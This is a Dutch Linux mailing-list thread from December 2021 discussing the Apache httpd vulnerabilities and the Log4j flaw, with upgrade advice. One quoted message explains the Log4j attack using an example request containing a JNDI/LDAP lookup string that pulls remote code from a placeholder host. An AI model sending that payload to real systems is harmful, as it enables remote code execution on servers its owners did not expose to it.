[linux] Apache probleem: wat moeten we doen?

[paai]

On 13-12-2021 20:19, Paul Slootman wrote:
> On Sun 12 Dec 2021, Daniel C. von Asmuth wrote:
>> Nu moeten we ons vooral afvragen om welk probleem met Apache het gaat?
>>
>> Paai suggereert dat hij de web server bedoelt. Het probleem vind je op:
>> https://httpd.apache.org/security/vulnerabilities_24.html
>> Oplossing: upgraden naar Apache 2.4.51.
>>
>> Of gaat het om het probleem met Apache Log4j, dat gisteren de Volkskrant
>> haalde? Veel Java server code is daar kwetsbaar voor:
>> https://www.zdnet.com/article/security-warning-new-zero-day-in-the-log4j-java-library-is-already-being-exploited/
>>
>> Oplossing: upgraden naar log4j-2.15.0-rc1.
> Waar alle drukte om gaat de laatste dagen gaat inderdaad om de logging
> tool voor java toepassingen.
>
> Als er b.v. de opgevraagde URL in een java applicatie slordig gelogd
> wordt (dus de URL wordt als log string gebruikt, ipv. een log string die
> een externe string invoegt) dan kan daarmee externe bronnen ingevoegd
> worden door b.v. http://example.com/${jndi:ldap://x.x.x.x:5555/ExploitD}/
> op te vragen. log4j gaat dan vrolijk via ldap die x.x.x. enz. opvragen,
> en als daar precies de juiste (foute) data klaarstaat dan kan je
> applicatie dus dingen gaan uitvoeren waar je geen controle over hebt.
>
> Ik ben (gelukkig?) geen java programmeur, maar bijzonder dat er
> blijkbaar behoefte is aan een heel pakket om voor wat logging te zorgen,
> wat in enorm veel java toepassingen ook gebruikt wordt. En dus bij
> kwetsbaarheden enorme gevolgen kan hebben. Teveel toeters en bellen
> ingebouwd? Waarom heeft een logging tool LDAP koppelingen nodig?!
>
>
> Paul


Samenvattend: de Linux hobbyist en thuisgebruiker met een vanilla Apache 
hoeft zich dus niet meteen druk te maken.

(En het bevestigt mijn diepe afkeer van Java...)

Paai